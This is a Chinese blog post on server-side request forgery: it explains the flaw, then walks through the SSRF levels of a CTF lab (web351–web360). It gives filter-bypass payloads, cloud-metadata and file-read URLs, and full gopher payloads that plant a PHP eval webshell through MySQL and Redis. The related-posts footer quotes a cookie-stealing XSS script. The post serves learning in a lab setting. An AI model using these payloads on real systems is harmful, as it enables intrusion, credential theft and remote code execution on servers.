SSRF(服务器端请求伪造)基本原理&&靶场实现

已于 2025-05-20 21:05:54 修改
阅读量793 收藏 6
点赞数 16
分类专栏: WEB漏洞 文章标签: web安全 靶场练习
于 2025-05-20 20:35:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61231688/article/details/148098047
版权

1、漏洞原理

      攻击者通过构造恶意请求,诱使服务器向内部系统或第三方服务发起非预期的网络请求。其核心在于 服务器信任了不可信的用户输入,并基于该输入发起网络操作。

2、攻击场景与利用方式

1. 基础利用
攻击类型示例Payload目标
读取本地文件file:///etc/passwd泄露服务器敏感文件
访问内网服务http://192.168.1.1:8080/admin探测或攻击内部系统
云元数据泄露http://169.254.169.254/latest/meta-data获取云主机凭证(如AWS)
2. 协议滥用
协议利用方式效果
dict://dict://attacker:port/data探测端口或发送任意TCP数据
gopher://gopher://attacker:80/_SSRF_PAYLOAD构造复杂协议请求(如Redis命令)
php://php://filter/convert.base64-encode/resource=/etc/passwd读取文件并Base64编码

 

3、靶场实现

web351

POST请求url=http://127.0.0.1/flag.php
得到flag

web352

这道题要求必须是http或https协议,而且不能是本地地址
    将127.0.0.1转换为十六进制  0X7f000001

web353


本题不仅限制为http而且将127.0开头都过滤了
上题的方式依然可用
还可以url=http://0/flag.php或者url=http://127.1/flag.php直接访问0,等于访问127.0.0.1

1. IPv4 地址的简化表示
    IPv4 地址本质是 32 位整数,通常用点分十进制格式(如 127.0.0.1)表示。
    整数转换规则:在某些网络库或编程语言中,IP 地址的输入支持直接使用整数(如 0 代表 0.0.0.0,2130706433 代表 127.0.0.1)。
    特殊值 0:在 URL 中,0 可能被解析为以下地址:
        0.0.0.0(所有网络接口的监听地址)。
        127.0.0.1(本地回环地址,具体行为取决于代码逻辑或网络库实现)。
2. 域名解析的兼容性
    无效域名处理:当浏览器或网络库遇到无法解析的域名(如 <http://0/)时,>
    可能尝试将其转换为本地地址。
    历史兼容性:部分旧系统或网络库会将 0 视为 127.0.0.1 的别名,以简化本地测试。
    
   

web354


这题将0 1过滤了并且限制只能用http和https
采用解析到本地的域名绕过
<http://safe.taobao.com/>
<http://114.taobao.com/>
<http://wifi.aliyun.com/>
<http://imis.qq.com/>
<http://localhost.sec.qq.com/>
<http://ecd.tencent.com/>
这些都可以解析到127.0.0.1

 

web355

本题限制访问地址字符小于5
url=http://0/flag.php

 

web356

与上题一样url=http://0/flag.php

 

web357


使用 gethostbyname() 将 URL 中的域名解析为对应的 IP 地址
通过 filter_var() 验证得到的 IP 地址是否为有效的公共 IP 地址,并且不是私有或保留地址
使用 file_get_contents() 获取并输出该 URL 对应的内容
利用Location进行重定向,写一个重定向的文件1.php放在服务器上
<?php
header("Location:<http://127.0.0.1/flag.php>");

url=http://ip/1.php得到flag

web358

本题代码要求ctf.开头和show结尾(不区分大小写)
利用 @ 分割用户名和主机:
url=http://ctf.@127.0.0.1/flag.php?show

web359

使用gopherus协议打出无密码mysql

select "<?php eval($_POST[1]);?>" into outfile 'var/www/html/1.php

先登录平台

在check.php页面进行传参

gopher://127.0.0.1:3306/_%a3%00%00%01%85%a6%ff%01%00%00%00%01%21%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%72%6f%6f%74%00%00%6d%79%73%71%6c%5f%6e%61%74%69%76%65%5f%70%61%73%73%77%6f%72%64%00%66%03%5f%6f%73%05%4c%69%6e%75%78%0c%5f%63%6c%69%65%6e%74%5f%6e%61%6d%65%08%6c%69%62%6d%79%73%71%6c%04%5f%70%69%64%05%32%37%32%35%35%0f%5f%63%6c%69%65%6e%74%5f%76%65%72%73%69%6f%6e%06%35%2e%37%2e%32%32%09%5f%70%6c%61%74%66%6f%72%6d%06%78%38%36%5f%36%34%0c%70%72%6f%67%72%61%6d%5f%6e%61%6d%65%05%6d%79%73%71%6c%43%00%00%00%03%73%65%6c%65%63%74%20%22%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%31%5d%29%3b%3f%3e%22%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%31%2e%70%68%70%01%00%00%00%01

将后面的二次编码

returl=gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2547%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2527%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%2520%253f%253e%2527%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2531%252e%2570%2568%2570%2527%253b%2501%2500%2500%2500%2501

returl=gopher://127.0.0.1:3306/_%25a3%2500%2500%2501%2585%25a6%25ff%2501%2500%2500%2500%2501%2521%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2500%2572%256f%256f%2574%2500%2500%256d%2579%2573%2571%256c%255f%256e%2561%2574%2569%2576%2565%255f%2570%2561%2573%2573%2577%256f%2572%2564%2500%2566%2503%255f%256f%2573%2505%254c%2569%256e%2575%2578%250c%255f%2563%256c%2569%2565%256e%2574%255f%256e%2561%256d%2565%2508%256c%2569%2562%256d%2579%2573%2571%256c%2504%255f%2570%2569%2564%2505%2532%2537%2532%2535%2535%250f%255f%2563%256c%2569%2565%256e%2574%255f%2576%2565%2572%2573%2569%256f%256e%2506%2535%252e%2537%252e%2532%2532%2509%255f%2570%256c%2561%2574%2566%256f%2572%256d%2506%2578%2538%2536%255f%2536%2534%250c%2570%2572%256f%2567%2572%2561%256d%255f%256e%2561%256d%2565%2505%256d%2579%2573%2571%256c%2543%2500%2500%2500%2503%2573%2565%256c%2565%2563%2574%2520%2522%253c%253f%2570%2568%2570%2520%2565%2576%2561%256c%2528%2524%255f%2550%254f%2553%2554%255b%2531%255d%2529%253b%253f%253e%2522%2520%2569%256e%2574%256f%2520%256f%2575%2574%2566%2569%256c%2565%2520%2527%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%252f%2531%252e%2570%2568%2570%2501%2500%2500%2500%2501

查看flag.txt

web360

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2430%0D%0A%0A%0A%3C%3Fphp%20eval%28%24_POST%5Bcmd%5D%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

二次编码

gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252430%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_POST%255Bcmd%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

上传成功

哥斯拉连接在根目录得到flag

SSRF服务器端请求伪造
2302_79885863的博客
05-12 1214
1.社交分享功能:获取超链接的标题等内容进行显示2.转码服务:通过URL地址把原地址的网页内容调优使其适合手机3.屏幕浏览在线翻译:给网址翻译对应网页的内容4.图片加载/下载:例如富文本编辑器中的点击下载图片到本地;5.通过URL地址加载或下载图片云服务厂商:它会远程执行一些命令来判断网站是否存活等,所以如果可以捕获相应的信息,就可以进行ssrf测试6.编码处理7.可以利用google 语法加上这些关键字去寻找SSRF漏洞。从远程服务器请求资源----》找SSRF
漏洞篇(SSRF 服务器端请求伪造
m0_58001548的博客
04-19 1297
SSRF(Server-Side Request Forgery:服务器端请求伪造)通过篡改 HTTP 请求中的资源地址发送给服务器,服务器没有校验请求的合法性,服务器解析用户传递过来的请求,处理之后返回给用户。例如:1. HTTP 请求:www.xuegod.cn/xxx.php?2. 服务器接收到请求之后获取图片3. 服务器获取到图片后将图片返回给用户。问题产生在第二步,服务器会向第三方站点发送请求并获取资源文件,如果网站对资源文件的地址没。
Pikachu靶场SSRF服务器端请求伪造
m0_46467017的博客
08-24 1142
SSRF漏洞(服务器端请求伪造):是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。
【Pikachu】SSRF 服务器端请求伪造
过期的秋刀鱼
08-21 543
libcurl同时也支持HTTPS认证、HTTP POST、HTTP PUT、 FTP 上传(这个也能通过PHP的FTP扩展完成)、HTTP 基于表单的上传、代理、cookies和用户名+密码的认证。,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。PHP支持的由Daniel Stenberg创建的libcurl库允许你与各种的服务器使用各种类型的协议进行连接和通讯。根据后台使用的函数的不同,对应的影响和利用方法又有不一样。
SSRF - 服务器端请求伪造
m0_61858762的博客
08-25 1034
其形成的原因大都是由于服务端,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。数据流:攻击者----->服务器---->目标地址curl支持很多协议,有FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE以及LDAP。
SSRF-服务器端请求伪造
klcyl_0106的博客
07-15 818
SSRF漏洞
SSRF--服务器端请求伪造
qq_68233961的博客
10-08 958
SSRF--服务器端请求伪造
服务器端请求伪造SSRF)漏洞解析
CoffeMilk的博客
09-27 1247
SSRF攻击是通过连接外网的Web服务器与它相连而与外网隔离的内部服务器或系统。 SSRF形成的原因大部分是由于该连通外网的服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。利用该连通外网服务器端存在缺陷的web程序作为代理攻击远程和本地的服务器。
SSRF漏洞复现(服务器端请求伪造)
人们并不感谢罗辑
08-26 1173
SSRF服务端请求伪造(Server-Side Request Forgery),是一种由攻击者构造形成由服务器端发起请求的一个漏洞。利用一个可以发起网络请求的服务当作跳板来攻击内部其他服务。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统SSRF攻击的目标是从外网无法访问的内部系统。
SSRF-Testing:SSRF服务器端请求伪造)测试资源
04-23
SSRF服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ ...
网络安全之网络攻击spring临时文件利用
最新发布
anquan2233的博客
05-20 1086
本文探索了JDBC MySQL驱动在利用临时文件进行不出网环境下的反序列化利用,改变了攻击MySQL驱动需要外连FakeServer的传统攻击手法,这种利用方式在realworld中具有更加隐蔽的特性。而文章后半段提到的临时文件部分可以无条件将一个纯净的文件上传到目标服务器并确定位置,对于需要本地文件的攻击(如:ClassPathXmlApplicationContext加载本地XML、加载本地类文件场景、加载本地插件场景等)也是个不错的利用思路。
WEB安全--Java安全--shiro550反序列化漏洞
m0_74800552的博客
05-16 530
shiro550反序列化
网络安全-等级保护(等保) 2-7-2 GB/T 25058—2019 第6章 总体安全规划
项目管理到售前,一路成长的伙伴!
05-19 1004
等。
网络安全-等级保护(等保) 2-7-4 GB/T 25058—2019 第8章 安全运行与维护 第9章 定级对象终止
项目管理到售前,一路成长的伙伴!
05-19 903
根据不同的安全保护等级要求的控制粒度,分析所需要运行管理控制内容,并以此定义不同运行管 理角色的职责。
Web安全核心内容与常见漏洞总结
weixin_47389477的博客
05-14 438
启用 ‌Content Security Policy(CSP)‌ 限制脚本加载源,阻断 XSS 攻击链。使用参数化查询(Prepared Statements)防御 SQL 注入。对用户输入进行严格校验(如正则表达式匹配),过滤特殊字符(如。输出数据时进行 HTML 实体编码,避免 XSS 攻击。实现细粒度权限管理(如 RBAC 模型),避免越权操作。部署 ‌Web 应用防火墙(WAF)‌ 过滤恶意流量。使用 SSL/TLS 加密数据传输,防止中间人攻击6。强制使用多因素认证(MFA)提升账户安全性。
网络安全利器:蜜罐技术详解
TechEnthusiast的博客
05-18 342
蜜罐(Honeypot)是一种安全资源,其价值在于被探测、攻击或未经授权使用。简单来说,蜜罐就是一个诱饵系统,用来吸引黑客的注意力,使其免于攻击真实的目标系统。fill:#333;color:#333;color:#333;fill:none;诱骗监控攻击者蜜罐虚拟系统真实系统收集攻击数据分析威胁蜜罐技术作为网络安全防御体系中的重要组成部分,为组织提供了主动防御和威胁情报收集的有力工具。随着网络攻击手段的不断演进,蜜罐技术也在持续发展,以应对新的安全挑战。
Web安全基础:深度解析与实战指南
2501_90994755的博客
05-17 897
Web安全是动态对抗的领域,需要持续跟踪最新威胁情报(如MITRE ATT&CK框架)、参与漏洞披露社区(如CVE Details)。建议大学生通过构建个人实验室(如Proxmox VE虚拟化环境)、参与开源安全项目(如Apache Security Team)积累实战经验。安全不仅是技术问题,更是涉及法律、管理和伦理的系统工程。
【网络安全】SQL注入
Dalik1018的博客
05-12 2978
SQL 注入是一种常见的网络攻击手段,它专门针对程序员在编写代码时的疏忽。你在网上注册了一个账号,填写用户名和密码后点击提交。正常情况下,网站会将你输入的信息发送到数据库进行验证,看看用户名是否存在,密码是否正确。但如果网站对用户输入的数据没有进行严格的检查,黑客就有机会在你输入的内容里添加一些特殊的 SQL 语句。
ssrf靶场
03-19
### 关于 SSRF 漏洞练习靶场和学习资料 #### 官方推荐的 Web 安全漏洞测试平台 对于 SSRF(Server-Side Request Forgery)漏洞的学习,可以尝试使用 Pikachu 平台进行实践操作。这是一个由官方提供的、专注于 Web 安全漏洞测试的开源项目[^1]。 #### 实际案例中的 Payload 设计 在实际环境中,SSRF 的利用通常涉及绕过输入过滤器来访问内部服务或接口。例如,在某实验场景下,可以通过构造如下 payload 来实现对目标系统的 SSRF 攻击: ```plaintext stockApi=http://localhost:80%2523@stock.weliketoshop.net/admin/delete?username=carlos ``` 此 payload 利用了 URL 编码技巧 `%2523` 替代 `#` 字符,从而成功绕过了基于白名单的输入过滤机制[^2]。 #### CSRF 和 XSS 结合的应用场景分析 除了 SSRF 外,CSRF(跨站请求伪造)也是常见的攻击手段之一。通过获取目标网站生成的 CSRF 令牌并诱导用户点击恶意链接,攻击者能够执行未经授权的操作[^3]。而在某些情况下,为了进一步提升攻击效果,还可以结合存储型 XSS 功能完成更复杂的攻击链路设计。比如以下脚本可用于窃取用户的 Cookie 数据: ```javascript <script>document.location='//xxxxxxxxxxxxxxxx.web-security-academy.net/'+document.cookie</script> ``` 该代码片段展示了如何利用 XSS 注入技术捕获受害者的敏感信息,并将其发送至攻击者控制的服务端地址上[^4]。 #### 推荐的学习资源与在线实验室 针对希望深入研究 SSRF 及其他网络安全领域知识的人群来说,可以从以下几个方面入手查找合适的教育材料或者模拟环境来进行训练: - **Pikachu**: 如前所述,它是一个综合性的渗透测试演练工具集,涵盖了多种类型的常见漏洞类型。 - **PortSwigger Web Security Academy**: 提供了一系列高质量的教学课程以及互动式的虚拟机实例用于实操体验各种网络威胁防护措施的有效性和局限性。 - **Hack The Box / TryHackMe**: 这些平台上也有专门面向初学者到高级玩家的不同难度级别的房间可供挑战,其中就包含了关于服务器端请求伪造等相关主题的内容讲解和技术分享文章。 综上所述,无论是理论基础还是动手能力培养都非常重要的前提条件下,合理选用上述提到的各种公开可用资源将会极大地促进个人技能水平的进步与发展!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ᴳᴼᴼᴰ ᴺᴵᴳᴴᵀ ᵕ̈

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值